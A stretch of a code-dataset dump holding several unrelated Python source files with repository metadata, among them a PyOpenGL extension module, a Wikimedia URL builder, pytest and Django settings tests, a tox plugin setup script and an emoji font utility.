] | 64 | 2016-04-09T14:26:49.000Z | 2022-03-21T11:19:47.000Z | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.WGL import _types as _cs
# End users want this...
from OpenGL.raw.WGL._types import *
from OpenGL.raw.WGL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'WGL_NV_render_texture_rectangle'
def _f( function ):
    # Wrap *function* as a WGL extension entry point for this extension,
    # routing errors through the shared checker.
    # NOTE(review): file is autogenerated ("do not edit") -- regenerate
    # rather than hand-patching if the upstream XML changes.
    return _p.createFunction( function,_p.PLATFORM.WGL,'WGL_NV_render_texture_rectangle',error_checker=_errors._error_checker)
WGL_BIND_TO_TEXTURE_RECTANGLE_RGBA_NV=_C('WGL_BIND_TO_TEXTURE_RECTANGLE_RGBA_NV',0x20A1)
WGL_BIND_TO_TEXTURE_RECTANGLE_RGB_NV=_C('WGL_BIND_TO_TEXTURE_RECTANGLE_RGB_NV',0x20A0)
WGL_TEXTURE_RECTANGLE_NV=_C('WGL_TEXTURE_RECTANGLE_NV',0x20A2)
| 42.277778 | 126 | 0.837057 |
1a074e7c1d1073022cd675818d539842a5c881e8 | 958 | py | Python | wiki_insight/url_builder.py | kvin007/wiki_insight | 6036e4394e60968dd2be2d261e3e87e56cf38726 | [
"MIT"
] | null | null | null | wiki_insight/url_builder.py | kvin007/wiki_insight | 6036e4394e60968dd2be2d261e3e87e56cf38726 | [
"MIT"
] | null | null | null | wiki_insight/url_builder.py | kvin007/wiki_insight | 6036e4394e60968dd2be2d261e3e87e56cf38726 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from docs import conf
class UrlBuilder:
    """Builds the URLs of the Wikimedia pageview dump files to download.

    One URL is produced per hour, counting backwards from "now".
    """

    def __init__(self, hours_backwards):
        """
        Args:
            hours_backwards: number of hourly dump files to build URLs for.
        """
        self._base_link = conf.base_link
        self._hours_backwards = hours_backwards

    def _get_base_url(self, now=None):
        """Return the month directory URL, e.g. '<base>/2024/2024-01/'.

        *now* defaults to the current time for backward compatibility.
        """
        if now is None:
            now = datetime.now()
        year, month = now.strftime("%Y,%m").split(",")
        return f'{self._base_link}{year}/{year}-{month}/'

    def get_urls(self):
        """Return one pageviews dump URL per hour in the configured window."""
        # Snapshot the clock once so every URL is computed relative to the
        # same instant. The original re-read datetime.now() per iteration and
        # again inside _get_base_url(), which could drift across an hour (or
        # month) boundary mid-call and yield inconsistent URLs.
        now = datetime.now()
        base_url = self._get_base_url(now)
        hours_list = [(now - timedelta(hours=x)).strftime("%Y,%m,%d,%H").split(",")
                      for x in range(self._hours_backwards)]
        urls = []
        for year, month, day, hour in hours_list:
            file_name = f'pageviews-{year}{month}{day}-{hour}0000'
            urls.append(base_url + file_name + conf.file_format)
        return urls
| 38.32 | 94 | 0.624217 |
280176591eba40e1ba13623ac64e1e3628eb5bb7 | 4,142 | py | Python | tests/test_accept_batch.py | Submissions/shepherd | f4bc2b76226ffae8fad8bef95a636ae0881d0ffb | [
"MIT"
] | null | null | null | tests/test_accept_batch.py | Submissions/shepherd | f4bc2b76226ffae8fad8bef95a636ae0881d0ffb | [
"MIT"
] | 8 | 2018-02-05T21:36:53.000Z | 2019-06-21T15:05:41.000Z | tests/test_accept_batch.py | Submissions/shepherd | f4bc2b76226ffae8fad8bef95a636ae0881d0ffb | [
"MIT"
] | 4 | 2017-12-06T19:06:01.000Z | 2018-01-11T15:54:58.000Z | from filecmp import cmp
from os import path
from subprocess import run, DEVNULL, PIPE
from sys import executable, stdout, stderr
from py.path import local
from pytest import fixture, mark
import yaml
def test_fixture(accept_batch_fixture):
    """Sanity-check the fixture itself: config contents and directory layout."""
    # Dump fixture attributes so pytest shows them on failure.
    for k in sorted(vars(accept_batch_fixture)):
        print(k, getattr(accept_batch_fixture, k))
    with open(accept_batch_fixture.root_dir.join('config.yaml')) as fin:
        config = yaml.safe_load(fin)
    print()
    for k in sorted(config):
        print(k, config[k])
    # The generated config must point at the fixture's own temp roots.
    assert 'asp_root' in config
    assert 'sub_root' in config
    assert config['asp_root'] == accept_batch_fixture.asp_root
    assert config['sub_root'] == accept_batch_fixture.sub_root
    assert accept_batch_fixture.asp_root.isdir()
    assert accept_batch_fixture.sub_root.isdir()
    assert accept_batch_fixture.input_batch_dir.isdir()
    assert (accept_batch_fixture.input_batch_dir / 'meta.yaml').isfile()
def test_can_run_accept_batch(ran_accept_batch):
    """Requesting the fixture is the whole test: it runs accept_batch.py."""
    pass
def test_exit_0(ran_accept_batch):
    """accept_batch.py must exit with status 0."""
    # Echo captured output so it is visible in the pytest report on failure.
    stdout.write(ran_accept_batch.stdout)
    stderr.write(ran_accept_batch.stderr)
    assert ran_accept_batch.returncode == 0
def test_batch_dir(ran_accept_batch):
    """{temp_dir}/sub_root/topmed/phase3/biome/01/24a"""
    batch_dir = ran_accept_batch.output_batch_dir
    assert batch_dir.isdir()
def test_md5_dir(ran_accept_batch):
    """{temp_dir}/sub_root/topmed/phase3/biome/01/24a/md5"""
    assert (ran_accept_batch.output_batch_dir / 'md5').isdir()
def test_validation_dir(ran_accept_batch):
    """{temp_dir}/sub_root/topmed/phase3/biome/01/24a/validation"""
    assert (ran_accept_batch.output_batch_dir / 'validation').isdir()
def test_state_dir(ran_accept_batch):
    """{temp_dir}/sub_root/topmed/phase3/biome/01/24a/state
    contents: current.yaml -> 00.yaml"""
    state_dir = ran_accept_batch.output_batch_dir / 'state'
    print(repr(state_dir))
    assert state_dir.isdir()
    # Initial state snapshot must match the canned expected contents.
    state_file = state_dir / '00.yaml'
    print(repr(state_file))
    assert state_file.isfile()
    assert state_file.read_text('ascii') == ran_accept_batch.state_00_contents
    # current.yaml is a symlink that resolves to the latest snapshot.
    current_link = state_dir / 'current.yaml'
    print(repr(current_link))
    assert current_link.islink()
    assert current_link.realpath() == state_file
def test_dest_dir(ran_accept_batch):
    """{temp_dir}/asp_root/BioMe/BioMe_batch24a
    contents: meta.yaml containing link to batch_dir"""
    assert ran_accept_batch.dest_dir.isdir()
@fixture(scope='module')
def ran_accept_batch(accept_batch_fixture):
    """Run accept_batch.py once per test module and record its outputs."""
    args = [executable,
            'accept_batch.py',
            'tests/resources/accept_batch/topmed/phase3/biome/01/24a/']
    # Point the script at the fixture's temp config via its env variable.
    # NOTE(review): env= replaces the whole environment -- presumably
    # accept_batch.py needs nothing else (PATH, HOME); confirm.
    cp = run(args, stdin=DEVNULL, stdout=PIPE, stderr=PIPE, encoding='ascii',
             env=dict(SHEPHERD_CONFIG_FILE=accept_batch_fixture.config_file))
    # Stash the results on the fixture object for the assertion tests.
    accept_batch_fixture.stdout = cp.stdout
    accept_batch_fixture.stderr = cp.stderr
    accept_batch_fixture.returncode = cp.returncode
    return accept_batch_fixture
@fixture(scope='module')
def accept_batch_fixture(tmpdir_factory):
    """Module-scoped temp layout + config for the accept_batch tests."""
    return AcceptBatchFixture(tmpdir_factory)
class AcceptBatchFixture:
    """Bundles the temp directory layout, config file, and expected outputs
    that accept_batch.py needs."""

    def __init__(self, tmpdir_factory):
        self.resources_path = local('tests/resources')
        self.root_dir = tmpdir_factory.mktemp('accept_batch')
        self.sub_root = self.root_dir.ensure_dir('sub_root')
        self.asp_root = self.root_dir.ensure_dir('asp_root')
        # Input batch shipped with the test resources.
        self.input_batch_dir = (
            self.resources_path / 'accept_batch/topmed/phase3/biome/01/24a'
        )
        # Locations the script under test is expected to create.
        self.output_batch_dir = self.sub_root / 'topmed/phase3/biome/01/24a'
        self.dest_dir = self.asp_root / 'BioMe/BioMe_batch24a'
        # Main config file
        self.config_file = self.root_dir.join('config.yaml')
        config = dict(asp_root=str(self.asp_root), sub_root=str(self.sub_root))
        self.config_file.write_text(
            yaml.dump(config, default_flow_style=False), 'ascii')
        # Expected contents state_00.yaml
        state_00_yaml = local('tests/resources/state_00.yaml')
        self.state_00_contents = state_00_yaml.read_text('ascii')
60d250032d65ec25a4b2e1b44d38cab280cc43c4 | 36 | py | Python | backend/backend/accounts/signals/__init__.py | LloydTao/django-nuxt-auth | b17aa1b6c8e4991e572e19dcd3f656721b8d1501 | [
"MIT"
] | null | null | null | backend/backend/accounts/signals/__init__.py | LloydTao/django-nuxt-auth | b17aa1b6c8e4991e572e19dcd3f656721b8d1501 | [
"MIT"
] | null | null | null | backend/backend/accounts/signals/__init__.py | LloydTao/django-nuxt-auth | b17aa1b6c8e4991e572e19dcd3f656721b8d1501 | [
"MIT"
] | null | null | null | from .profile import create_profile
| 18 | 35 | 0.861111 |
f1a69811f8f09b15d9d05866143c88455f7fe76e | 1,502 | py | Python | packages/python-packages/tox-monorepo/setup.py | scbedd/azure-sdk-tools | dcbe480642d53ea524438da39a3af758646b5bd3 | [
"MIT"
] | 84 | 2015-01-01T23:40:15.000Z | 2022-03-10T20:20:40.000Z | packages/python-packages/tox-monorepo/setup.py | scbedd/azure-sdk-tools | dcbe480642d53ea524438da39a3af758646b5bd3 | [
"MIT"
] | 2,219 | 2015-01-06T20:35:05.000Z | 2022-03-31T23:36:52.000Z | packages/python-packages/tox-monorepo/setup.py | scbedd/azure-sdk-tools | dcbe480642d53ea524438da39a3af758646b5bd3 | [
"MIT"
] | 127 | 2015-01-02T01:43:51.000Z | 2022-03-24T20:02:13.000Z | from setuptools import setup, find_packages
import os, re
PACKAGE_NAME = "tox-monorepo"
DESCRIPTION = "A tox plugin built to allow sharing of a common tox.ini file across repositories with high package counts."

# Read the version from tox_monorepo/version.py without importing the package.
with open(os.path.join("tox_monorepo", "version.py"), "r") as fd:
    match = re.search(
        r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]', fd.read(), re.MULTILINE
    )

# Fix: the original called .group(1) directly on the search result, so a
# missing VERSION line raised AttributeError before the "Cannot find version"
# check could ever run. Check for a match first.
if not match:
    raise RuntimeError("Cannot find version information")
version = match.group(1)

with open("README.md", encoding="utf-8") as f:
    long_description = f.read()

setup(
    name=PACKAGE_NAME,
    description=DESCRIPTION,
    version=version,
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/Azure/azure-sdk-tools/",
    author="Microsoft Corporation",
    author_email="azuresdkengsysadmins@microsoft.com",
    license="MIT License",
    packages=find_packages(),
    install_requires=["tox >= 3.12.0"],
    entry_points={"tox": ["monorepo=tox_monorepo:monorepo"]},
    classifiers=[
        "Framework :: tox",
        "Development Status :: 3 - Alpha",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "License :: OSI Approved :: MIT License",
    ],
)
| 33.377778 | 122 | 0.64514 |
6e2f1cd2c982ceb6ff324d7ea93570a8b6ea90a3 | 2,338 | py | Python | map_pua_emoji.py | Skrity/blobmoji | 137924759529d6d4032df7381e72cdb5a70329a3 | [
"Apache-2.0"
] | 1 | 2021-07-22T20:56:28.000Z | 2021-07-22T20:56:28.000Z | map_pua_emoji.py | Skrity/blobmoji | 137924759529d6d4032df7381e72cdb5a70329a3 | [
"Apache-2.0"
] | null | null | null | map_pua_emoji.py | Skrity/blobmoji | 137924759529d6d4032df7381e72cdb5a70329a3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
#
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Modify an emoji font to map legacy PUA characters to standard ligatures."""
__author__ = 'roozbeh@google.com (Roozbeh Pournader)'
import sys
import itertools
from fontTools import ttLib
from nototools import font_data
import add_emoji_gsub
def get_glyph_name_from_gsub(char_seq, font):
    """Find the glyph name for ligature of a given character sequence from GSUB.

    Returns the ligature glyph name, or None if any character in *char_seq*
    is unmapped or no matching ligature is found.
    """
    cmap = font_data.get_cmap(font)
    # FIXME: So many assumptions are made here.
    try:
        first_glyph = cmap[char_seq[0]]
        rest_of_glyphs = [cmap[ch] for ch in char_seq[1:]]
    except KeyError:
        # Some character in the sequence is not in the font's cmap at all.
        return None
    for lookup in font['GSUB'].table.LookupList.Lookup:
        # Assumes every lookup is a ligature-substitution lookup with exactly
        # one subtable -- TODO confirm for fonts beyond the emoji build.
        ligatures = lookup.SubTable[0].ligatures
        try:
            for ligature in ligatures[first_glyph]:
                if ligature.Component == rest_of_glyphs:
                    return ligature.LigGlyph
        except KeyError:
            # No ligature set starts with first_glyph in this lookup.
            continue
    return None
def add_pua_cmap(source_file, target_file):
    """Add PUA characters to the cmap of the first font and save as second."""
    font = ttLib.TTFont(source_file)
    cmap = font_data.get_cmap(font)
    # Map each legacy PUA code point to the glyph of its standard
    # two-character ligature (keycaps and flags), when GSUB has one.
    for pua, (ch1, ch2) in itertools.chain(
        add_emoji_gsub.EMOJI_KEYCAPS.items(), add_emoji_gsub.EMOJI_FLAGS.items()
    ):
        if pua not in cmap:
            glyph_name = get_glyph_name_from_gsub([ch1, ch2], font)
            if glyph_name is not None:
                cmap[pua] = glyph_name
    font.save(target_file)
def main(argv):
    """Read the font named by argv[1] and write the PUA-mapped copy to argv[2]."""
    source, target = argv[1], argv[2]
    add_pua_cmap(source, target)


if __name__ == '__main__':
    main(sys.argv)
| 31.173333 | 81 | 0.664671 |
f3221bc0635e17ee25d87083f92efa7cf9d2f545 | 1,064 | py | Python | m4c_captioner.py | TownWilliam/mma_sr | b7d4704c47ccd6ac36a748e8af709184b65f9d38 | [
"MIT"
] | 2 | 2021-12-30T01:49:14.000Z | 2022-03-31T09:09:18.000Z | m4c_captioner.py | TownWilliam/mma_sr | b7d4704c47ccd6ac36a748e8af709184b65f9d38 | [
"MIT"
] | null | null | null | m4c_captioner.py | TownWilliam/mma_sr | b7d4704c47ccd6ac36a748e8af709184b65f9d38 | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
# Put this file in the location mmf/models/
from mmf.common.registry import registry
from mmf.models.mma_sr import M4C
@registry.register_model("m4c_captioner")
class M4CCaptioner(M4C):
    """M4C variant registered for image captioning.

    Behaves like M4C apart from captioner-specific configuration; the
    <unk>-suppression hook is kept below (commented out) for reference.
    """

    def __init__(self, config):
        super().__init__(config)
        # Fix: removed leftover debug prints (__bases__ dump and
        # "real_m4c_captioner" marker) that polluted stdout on every
        # model construction.
        self.remove_unk_in_pred = self.config.remove_unk_in_pred

    @classmethod
    def config_path(cls):
        """Default model config shipped with the package."""
        return "configs/models/m4c_captioner/defaults.yaml"

    # def _forward_output(self, sample_list, fwd_results):
    #     super()._forward_output(sample_list, fwd_results)
    #
    #     if self.remove_unk_in_pred:
    #         # avoid outputting <unk> in the generated captions
    #         if 'crude_scores' in fwd_results.keys():
    #             fwd_results["crude_scores"][..., self.answer_processor.UNK_IDX] = -1e10
    #         else:
    #             fwd_results["scores"][..., self.answer_processor.UNK_IDX] = -1e10
    #
    #     return fwd_results
6b2ca3e0a5b5395ef4267e5404a0a4908202cd85 | 15,789 | py | Python | tests/settings_tests/tests.py | xavfernandez/django | daaeb8415823444a9020460cf825efc3fae866a2 | [
"BSD-3-Clause"
] | 2 | 2016-07-23T18:08:37.000Z | 2016-07-24T09:54:34.000Z | tests/settings_tests/tests.py | xavfernandez/django | daaeb8415823444a9020460cf825efc3fae866a2 | [
"BSD-3-Clause"
] | null | null | null | tests/settings_tests/tests.py | xavfernandez/django | daaeb8415823444a9020460cf825efc3fae866a2 | [
"BSD-3-Clause"
] | null | null | null | import os
import sys
from types import ModuleType
import unittest
import warnings
from django.conf import LazySettings, Settings, settings
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpRequest
from django.test import (SimpleTestCase, TransactionTestCase, TestCase,
modify_settings, override_settings, signals)
from django.utils import six
@modify_settings(ITEMS={
'prepend': ['b'],
'append': ['d'],
'remove': ['a', 'e']
})
@override_settings(ITEMS=['a', 'c', 'e'], ITEMS_OUTER=[1, 2, 3],
TEST='override', TEST_OUTER='outer')
class FullyDecoratedTranTestCase(TransactionTestCase):
available_apps = []
def test_override(self):
self.assertListEqual(settings.ITEMS, ['b', 'c', 'd'])
self.assertListEqual(settings.ITEMS_OUTER, [1, 2, 3])
self.assertEqual(settings.TEST, 'override')
self.assertEqual(settings.TEST_OUTER, 'outer')
@modify_settings(ITEMS={
'append': ['e', 'f'],
'prepend': ['a'],
'remove': ['d', 'c'],
})
def test_method_list_override(self):
self.assertListEqual(settings.ITEMS, ['a', 'b', 'e', 'f'])
self.assertListEqual(settings.ITEMS_OUTER, [1, 2, 3])
@modify_settings(ITEMS={
'append': ['b'],
'prepend': ['d'],
'remove': ['a', 'c', 'e'],
})
def test_method_list_override_no_ops(self):
self.assertListEqual(settings.ITEMS, ['b', 'd'])
@modify_settings(ITEMS={
'append': 'e',
'prepend': 'a',
'remove': 'c',
})
def test_method_list_override_strings(self):
self.assertListEqual(settings.ITEMS, ['a', 'b', 'd', 'e'])
@modify_settings(ITEMS={'remove': ['b', 'd']})
@modify_settings(ITEMS={'append': ['b'], 'prepend': ['d']})
def test_method_list_override_nested_order(self):
self.assertListEqual(settings.ITEMS, ['d', 'c', 'b'])
@override_settings(TEST='override2')
def test_method_override(self):
self.assertEqual(settings.TEST, 'override2')
self.assertEqual(settings.TEST_OUTER, 'outer')
def test_decorated_testcase_name(self):
self.assertEqual(FullyDecoratedTranTestCase.__name__, 'FullyDecoratedTranTestCase')
def test_decorated_testcase_module(self):
self.assertEqual(FullyDecoratedTranTestCase.__module__, __name__)
@modify_settings(ITEMS={
    'prepend': ['b'],
    'append': ['d'],
    'remove': ['a', 'e']
})
@override_settings(ITEMS=['a', 'c', 'e'], TEST='override')
class FullyDecoratedTestCase(TestCase):
    """Class-level override_settings/modify_settings stacking on a TestCase."""

    def test_override(self):
        # Class decorators apply bottom-up: override first, then modify.
        self.assertListEqual(settings.ITEMS, ['b', 'c', 'd'])
        self.assertEqual(settings.TEST, 'override')

    @modify_settings(ITEMS={
        'append': 'e',
        'prepend': 'a',
        'remove': 'c',
    })
    @override_settings(TEST='override2')
    def test_method_override(self):
        # Method-level decorators layer on top of the class-level result.
        self.assertListEqual(settings.ITEMS, ['a', 'b', 'd', 'e'])
        self.assertEqual(settings.TEST, 'override2')
class ClassDecoratedTestCaseSuper(TestCase):
    """
    Dummy class for testing max recursion error in child class call to
    super(). Refs #17011.
    """
    def test_max_recursion_error(self):
        pass
@override_settings(TEST='override')
class ClassDecoratedTestCase(ClassDecoratedTestCaseSuper):
    """override_settings as a class decorator on a subclassed TestCase."""

    def test_override(self):
        self.assertEqual(settings.TEST, 'override')

    @override_settings(TEST='override2')
    def test_method_override(self):
        # Method decorator wins over the class decorator.
        self.assertEqual(settings.TEST, 'override2')

    def test_max_recursion_error(self):
        """
        Overriding a method on a super class and then calling that method on
        the super class should not trigger infinite recursion. See #17011.
        """
        try:
            super(ClassDecoratedTestCase, self).test_max_recursion_error()
        except RuntimeError:
            self.fail()
@modify_settings(ITEMS={'append': 'mother'})
@override_settings(ITEMS=['father'], TEST='override-parent')
class ParentDecoratedTestCase(TestCase):
    # Base class whose settings decorators should be inherited by subclasses.
    pass
@modify_settings(ITEMS={'append': ['child']})
@override_settings(TEST='override-child')
class ChildDecoratedTestCase(ParentDecoratedTestCase):
    def test_override_settings_inheritance(self):
        # Parent decorators apply first; the child's are layered on top.
        self.assertEqual(settings.ITEMS, ['father', 'mother', 'child'])
        self.assertEqual(settings.TEST, 'override-child')
class SettingsTests(TestCase):
def setUp(self):
self.testvalue = None
signals.setting_changed.connect(self.signal_callback)
def tearDown(self):
signals.setting_changed.disconnect(self.signal_callback)
def signal_callback(self, sender, setting, value, **kwargs):
if setting == 'TEST':
self.testvalue = value
def test_override(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
self.assertEqual('test', settings.TEST)
del settings.TEST
def test_override_change(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
settings.TEST = 'test2'
self.assertEqual('test', settings.TEST)
del settings.TEST
def test_override_doesnt_leak(self):
self.assertRaises(AttributeError, getattr, settings, 'TEST')
with self.settings(TEST='override'):
self.assertEqual('override', settings.TEST)
settings.TEST = 'test'
self.assertRaises(AttributeError, getattr, settings, 'TEST')
@override_settings(TEST='override')
def test_decorator(self):
self.assertEqual('override', settings.TEST)
def test_context_manager(self):
self.assertRaises(AttributeError, getattr, settings, 'TEST')
override = override_settings(TEST='override')
self.assertRaises(AttributeError, getattr, settings, 'TEST')
override.enable()
self.assertEqual('override', settings.TEST)
override.disable()
self.assertRaises(AttributeError, getattr, settings, 'TEST')
def test_class_decorator(self):
# SimpleTestCase can be decorated by override_settings, but not ut.TestCase
class SimpleTestCaseSubclass(SimpleTestCase):
pass
class UnittestTestCaseSubclass(unittest.TestCase):
pass
decorated = override_settings(TEST='override')(SimpleTestCaseSubclass)
self.assertIsInstance(decorated, type)
self.assertTrue(issubclass(decorated, SimpleTestCase))
with six.assertRaisesRegex(self, Exception,
"Only subclasses of Django SimpleTestCase*"):
decorated = override_settings(TEST='override')(UnittestTestCaseSubclass)
def test_signal_callback_context_manager(self):
self.assertRaises(AttributeError, getattr, settings, 'TEST')
with self.settings(TEST='override'):
self.assertEqual(self.testvalue, 'override')
self.assertEqual(self.testvalue, None)
@override_settings(TEST='override')
def test_signal_callback_decorator(self):
self.assertEqual(self.testvalue, 'override')
#
# Regression tests for #10130: deleting settings.
#
def test_settings_delete(self):
settings.TEST = 'test'
self.assertEqual('test', settings.TEST)
del settings.TEST
self.assertRaises(AttributeError, getattr, settings, 'TEST')
def test_settings_delete_wrapped(self):
self.assertRaises(TypeError, delattr, settings, '_wrapped')
def test_override_settings_delete(self):
"""
Allow deletion of a setting in an overridden settings set (#18824)
"""
previous_i18n = settings.USE_I18N
previous_l10n = settings.USE_L10N
with self.settings(USE_I18N=False):
del settings.USE_I18N
self.assertRaises(AttributeError, getattr, settings, 'USE_I18N')
# Should also work for a non-overridden setting
del settings.USE_L10N
self.assertRaises(AttributeError, getattr, settings, 'USE_L10N')
self.assertEqual(settings.USE_I18N, previous_i18n)
self.assertEqual(settings.USE_L10N, previous_l10n)
def test_override_settings_nested(self):
"""
Test that override_settings uses the actual _wrapped attribute at
runtime, not when it was instantiated.
"""
self.assertRaises(AttributeError, getattr, settings, 'TEST')
self.assertRaises(AttributeError, getattr, settings, 'TEST2')
inner = override_settings(TEST2='override')
with override_settings(TEST='override'):
self.assertEqual('override', settings.TEST)
with inner:
self.assertEqual('override', settings.TEST)
self.assertEqual('override', settings.TEST2)
# inner's __exit__ should have restored the settings of the outer
# context manager, not those when the class was instantiated
self.assertEqual('override', settings.TEST)
self.assertRaises(AttributeError, getattr, settings, 'TEST2')
self.assertRaises(AttributeError, getattr, settings, 'TEST')
self.assertRaises(AttributeError, getattr, settings, 'TEST2')
def test_allowed_include_roots_string(self):
"""
ALLOWED_INCLUDE_ROOTS is not allowed to be incorrectly set to a string
rather than a tuple.
"""
self.assertRaises(ValueError, setattr, settings,
'ALLOWED_INCLUDE_ROOTS', '/var/www/ssi/')
class TestComplexSettingOverride(TestCase):
    """Overriding a setting listed in COMPLEX_OVERRIDE_SETTINGS must warn."""

    def setUp(self):
        # Register a temporary "complex" setting name for the test.
        self.old_warn_override_settings = signals.COMPLEX_OVERRIDE_SETTINGS.copy()
        signals.COMPLEX_OVERRIDE_SETTINGS.add('TEST_WARN')

    def tearDown(self):
        signals.COMPLEX_OVERRIDE_SETTINGS = self.old_warn_override_settings
        self.assertFalse('TEST_WARN' in signals.COMPLEX_OVERRIDE_SETTINGS)

    def test_complex_override_warning(self):
        """Regression test for #19031"""
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            with override_settings(TEST_WARN='override'):
                self.assertEqual(settings.TEST_WARN, 'override')
            self.assertEqual(len(w), 1)
            # File extension may be .py, .pyc, etc. Compare only basename.
            self.assertEqual(os.path.splitext(w[0].filename)[0],
                             os.path.splitext(__file__)[0])
            self.assertEqual(str(w[0].message),
                             'Overriding setting TEST_WARN can lead to unexpected behavior.')
class TrailingSlashURLTests(TestCase):
"""
Tests for the MEDIA_URL and STATIC_URL settings.
They must end with a slash to ensure there's a deterministic way to build
paths in templates.
"""
settings_module = settings
def setUp(self):
self._original_media_url = self.settings_module.MEDIA_URL
self._original_static_url = self.settings_module.STATIC_URL
def tearDown(self):
self.settings_module.MEDIA_URL = self._original_media_url
self.settings_module.STATIC_URL = self._original_static_url
def test_blank(self):
"""
The empty string is accepted, even though it doesn't end in a slash.
"""
self.settings_module.MEDIA_URL = ''
self.assertEqual('', self.settings_module.MEDIA_URL)
self.settings_module.STATIC_URL = ''
self.assertEqual('', self.settings_module.STATIC_URL)
def test_end_slash(self):
"""
It works if the value ends in a slash.
"""
self.settings_module.MEDIA_URL = '/foo/'
self.assertEqual('/foo/', self.settings_module.MEDIA_URL)
self.settings_module.MEDIA_URL = 'http://media.foo.com/'
self.assertEqual('http://media.foo.com/',
self.settings_module.MEDIA_URL)
self.settings_module.STATIC_URL = '/foo/'
self.assertEqual('/foo/', self.settings_module.STATIC_URL)
self.settings_module.STATIC_URL = 'http://static.foo.com/'
self.assertEqual('http://static.foo.com/',
self.settings_module.STATIC_URL)
def test_no_end_slash(self):
"""
An ImproperlyConfigured exception is raised if the value doesn't end
in a slash.
"""
with self.assertRaises(ImproperlyConfigured):
self.settings_module.MEDIA_URL = '/foo'
with self.assertRaises(ImproperlyConfigured):
self.settings_module.MEDIA_URL = 'http://media.foo.com'
with self.assertRaises(ImproperlyConfigured):
self.settings_module.STATIC_URL = '/foo'
with self.assertRaises(ImproperlyConfigured):
self.settings_module.STATIC_URL = 'http://static.foo.com'
def test_double_slash(self):
"""
If the value ends in more than one slash, presume they know what
they're doing.
"""
self.settings_module.MEDIA_URL = '/stupid//'
self.assertEqual('/stupid//', self.settings_module.MEDIA_URL)
self.settings_module.MEDIA_URL = 'http://media.foo.com/stupid//'
self.assertEqual('http://media.foo.com/stupid//',
self.settings_module.MEDIA_URL)
self.settings_module.STATIC_URL = '/stupid//'
self.assertEqual('/stupid//', self.settings_module.STATIC_URL)
self.settings_module.STATIC_URL = 'http://static.foo.com/stupid//'
self.assertEqual('http://static.foo.com/stupid//',
self.settings_module.STATIC_URL)
class SecureProxySslHeaderTest(TestCase):
    """SECURE_PROXY_SSL_HEADER interaction with HttpRequest.is_secure()."""

    settings_module = settings

    def setUp(self):
        # Save the real value so each test can mutate it freely.
        self._original_setting = self.settings_module.SECURE_PROXY_SSL_HEADER

    def tearDown(self):
        self.settings_module.SECURE_PROXY_SSL_HEADER = self._original_setting

    def test_none(self):
        # Setting unset: requests are not considered secure.
        self.settings_module.SECURE_PROXY_SSL_HEADER = None
        req = HttpRequest()
        self.assertEqual(req.is_secure(), False)

    def test_set_without_xheader(self):
        # Header configured but absent from the request: not secure.
        self.settings_module.SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
        req = HttpRequest()
        self.assertEqual(req.is_secure(), False)

    def test_set_with_xheader_wrong(self):
        # Header present with a non-matching value: not secure.
        self.settings_module.SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
        req = HttpRequest()
        req.META['HTTP_X_FORWARDED_PROTOCOL'] = 'wrongvalue'
        self.assertEqual(req.is_secure(), False)

    def test_set_with_xheader_right(self):
        # Header present with the configured value: secure.
        self.settings_module.SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')
        req = HttpRequest()
        req.META['HTTP_X_FORWARDED_PROTOCOL'] = 'https'
        self.assertEqual(req.is_secure(), True)
class IsOverriddenTest(TestCase):
    """Tests for settings.is_overridden() across configuration sources."""

    def test_configure(self):
        # Settings supplied via configure() count as overridden.
        s = LazySettings()
        s.configure(SECRET_KEY='foo')
        self.assertTrue(s.is_overridden('SECRET_KEY'))

    def test_module(self):
        # Only names actually defined in the settings module are overridden.
        settings_module = ModuleType('fake_settings_module')
        settings_module.SECRET_KEY = 'foo'
        sys.modules['fake_settings_module'] = settings_module
        try:
            s = Settings('fake_settings_module')
            self.assertTrue(s.is_overridden('SECRET_KEY'))
            self.assertFalse(s.is_overridden('TEMPLATE_LOADERS'))
        finally:
            # Clean the fake module out of sys.modules even on failure.
            del sys.modules['fake_settings_module']

    def test_override(self):
        # override_settings() marks a setting overridden only inside the block.
        self.assertFalse(settings.is_overridden('TEMPLATE_LOADERS'))
        with override_settings(TEMPLATE_LOADERS=[]):
            self.assertTrue(settings.is_overridden('TEMPLATE_LOADERS'))
| 35.965831 | 93 | 0.661473 |
e8afd8060469457f8ee21f258f41574a80143df4 | 882 | py | Python | Server/app/models/user.py | JoMingyu/BookCheck-Backend | fbe71a39e385a3c739e7e40ab1153efbe7835576 | [
"MIT"
] | 1 | 2018-04-12T10:51:49.000Z | 2018-04-12T10:51:49.000Z | Server/app/models/user.py | JoMingyu/BookCheck-Backend | fbe71a39e385a3c739e7e40ab1153efbe7835576 | [
"MIT"
] | null | null | null | Server/app/models/user.py | JoMingyu/BookCheck-Backend | fbe71a39e385a3c739e7e40ab1153efbe7835576 | [
"MIT"
] | null | null | null | from datetime import datetime
from app.models import *
from app.models.library import LibraryModel
class UserBase(Document):
    """
    User Base Collection
    """
